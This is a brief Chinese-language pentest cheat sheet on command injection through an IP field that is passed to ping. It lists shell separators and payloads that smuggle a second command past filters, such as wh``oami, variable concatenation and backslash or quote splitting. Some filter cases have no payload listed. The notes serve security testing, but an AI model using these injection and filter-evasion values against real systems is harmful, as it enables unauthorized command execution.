在渗透测试过程中,会遇见一些关于命令执行的漏洞,下面是收集的一些常用命令:
; < > <> | || & && `` () ' '
假设一种场景,从前端接收ip比如:127.0.0.1,后端对该ip进行ping测试: ping 127.0.0.1
-
没有任何防护
-
过滤了|
-
过滤了 ; |
-
过滤了 ; | &
-
过滤了 whoami关键字
ping -c 1 127.0.0.1|wh``oami -
过滤了whoami ``
ping -c 1 127.0.0.1|wh''oami -
过滤了whoami `` ''
ping -c 1 127.0.0.1;a=who;b=ami;$a$b -
过滤了whoami `` '' $
ping -c 1 127.0.0.1|whoam""i - 过滤了whoami `` '' $ "" ;
ping -c 1 127.0.0.1|whoam\i